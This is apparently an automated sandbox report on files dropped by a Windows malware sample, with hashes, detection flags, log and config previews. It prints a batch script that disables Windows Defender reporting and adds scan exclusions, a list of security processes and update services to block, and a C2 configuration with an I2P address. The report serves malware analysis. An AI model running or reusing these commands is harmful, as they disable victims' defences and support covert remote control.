                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115712
                                  Entropy (8bit):6.277217301921545
                                  Encrypted:false
                                  SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                  MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                  SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                  SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                  SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):2069
                                  Entropy (8bit):5.46905637754495
                                  Encrypted:false
                                  SSDEEP:48:CFdHr+54yclD7hcm9FLZ4WlV5ZR5+sR55L+5HR5ik85OKQeD:idHxNdJ9VjFD
                                  MD5:B8CDE7B38E0BE506C5A6E613766F42DA
                                  SHA1:927CFDB2726EEBEBD4D0151CBB1383298EF3D207
                                  SHA-256:8933A4E45AA226869D6F4858FFE43B961E58B6457FBBB84D7A0D5603CAEFAD35
                                  SHA-512:B0BC1DDC9B1FDF4AAB9294F12DFE8780EF5FF510B76E7A4CC7A189550F1B874B21AF9A1B29D2C100357A24426715E12B91BA22B19CD459D46EA20F9F9A8F238A
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb2270e1cc)..[I] (tcp_connect) -
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):91136
                                  Entropy (8bit):6.2290767543196575
                                  Encrypted:false
                                  SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                  MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                  SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                  SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
                                  SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [SLPolicy]
                                  Category:dropped
                                  Size (bytes):441513
                                  Entropy (8bit):5.449545529389614
                                  Encrypted:false
                                  SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                  MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                  SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                  SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                  SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                  Malicious:false
                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):10451376
                                  Entropy (8bit):6.708065758846917
                                  Encrypted:false
                                  SSDEEP:196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
                                  MD5:312704A6232D74733DE04C6E00F8CF21
                                  SHA1:2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
                                  SHA-256:8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
                                  SHA-512:5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
                                  Malicious:false
                                  Preview:_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):3747
                                  Entropy (8bit):5.505268066587477
                                  Encrypted:false
                                  SSDEEP:96:ildJ9VjDT0HU0Hn0H1V40Hu0H+kQHR3WPOaI0HNVH4/HNx0HltHn:03THT000H0740O0TQxmPOaI0tV+v0FtH
                                  MD5:83E03316D6195F194123C52235E93D72
                                  SHA1:AB5D30FC5574858F764CF184D78C1BF5AFB9E865
                                  SHA-256:A78DE1C60587C9498365DE7F7C93608DA76BDE226FE7900CECE0073AD963B511
                                  SHA-512:01D5E33F87729A0CB0BCC5C2435B2B516DA7AE0D278721F9664694BC77B117110A3B37711E76A6DE0967CF60E0E981ECC5FCE47DFDF6A60C58BA74289A2B1A17
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user~1\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):98304
                                  Entropy (8bit):6.298274541598319
                                  Encrypted:false
                                  SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                                  MD5:319865D78CC8DF6270E27521B8182BFF
                                  SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                                  SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                                  SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:DOS batch file, ASCII text
                                  Category:dropped
                                  Size (bytes):259
                                  Entropy (8bit):4.933902901538645
                                  Encrypted:false
                                  SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                  MD5:261A842203ADB67547C83DE132C7A076
                                  SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                  SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                  SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                  Malicious:false
                                  Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                                  Process:C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
                                  File Type:Generic INItialization configuration [svc]
                                  Category:dropped
                                  Size (bytes):195
                                  Entropy (8bit):4.692426693515089
                                  Encrypted:false
                                  SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                                  MD5:E025B58CB2D118FAFAE00850EE91C5F9
                                  SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                                  SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                                  SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                                  Malicious:false
                                  Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                                  Process:C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):23779
                                  Entropy (8bit):5.126563091127519
                                  Encrypted:false
                                  SSDEEP:384:2bbEbNQ6s69WS8vv88o888888888888888j888888888888e888888808888888K:2bbEbNQ6s69WS8vv88o888888888888V
                                  MD5:3F3FAE262334D88DAA426A685B8FC9BD
                                  SHA1:72DDB4C3C901552038C0AA26B7B12023F2CD3453
                                  SHA-256:AE53045EEF4D46057CF0CC5010A2B185D4B0B4BA033010537382686D6F002B88
                                  SHA-512:AC6275A7B864D66AC8729B10ECA9ED54A3DF19BDCD4BE29DE5BC5F9075A531606F06DBDC5C81B99DB611C97370B063E5931DAAA79FB5BFCBA0AB4A229864F8B1
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user~1\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user~1\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user~1\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user~1\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_
                                  Process:C:\Users\user\Desktop\file.exe
                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:modified
                                  Size (bytes):10639360
                                  Entropy (8bit):7.4147455331909855
                                  Encrypted:false
                                  SSDEEP:196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
                                  MD5:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                  SHA1:C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
                                  SHA-256:44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
                                  SHA-512:B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 19%
                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):2464
                                  Entropy (8bit):3.2433536798164977
                                  Encrypted:false
                                  SSDEEP:24:QOaqdmuF3rk6+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxU:FaqdF7k6+AAHdKoqKFxcxkFaE
                                  MD5:9F110999AD02EB9D440A4C249AB593A9
                                  SHA1:A3E1B78216E6458FDF90F93CCB33F75F922EF1B0
                                  SHA-256:451477A217A9A3DC5553589D6EFB1A48B151A10258BFBA2402F0A7F0F4B896FD
                                  SHA-512:07EEC9D8860B88D12DA33911F2B97E111470623DFC8968630E68B5A057215DA90CA46ABC27ADA539255202950798F1512BC6B681B8E698F6901E5D09735B462A
                                  Malicious:false
                                  Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.u.e. .. S.e.p. .. 2.4. .. 2.0.2.4. .2.0.:.3.1.:.0.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):8568
                                  Entropy (8bit):4.958673415285098
                                  Encrypted:false
                                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                  MD5:27535CEE6740DFC50A78A0322415E67C
                                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                  Malicious:false
                                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [cnccli]
                                  Category:dropped
                                  Size (bytes):214
                                  Entropy (8bit):5.0997449470012635
                                  Encrypted:false
                                  SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                  MD5:26702FAAB91B6B144715714A96728F39
                                  SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                  SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                  SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                  Malicious:false
                                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [SLPolicy]
                                  Category:dropped
                                  Size (bytes):441513
                                  Entropy (8bit):5.449545529389614
                                  Encrypted:false
                                  SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                  MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                  SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                  SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                  SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                  Malicious:false
                                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):37376
                                  Entropy (8bit):5.7181012847214445
                                  Encrypted:false
                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):9146880
                                  Entropy (8bit):6.674868432808522
                                  Encrypted:false
                                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                  MD5:676064A5CC4729E609539F9C9BD9D427
                                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):129024
                                  Entropy (8bit):6.313152038164236
                                  Encrypted:false
                                  SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                  MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                  SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                  SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                  SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):91136
                                  Entropy (8bit):6.2290767543196575
                                  Encrypted:false
                                  SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                  MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                  SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                  SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
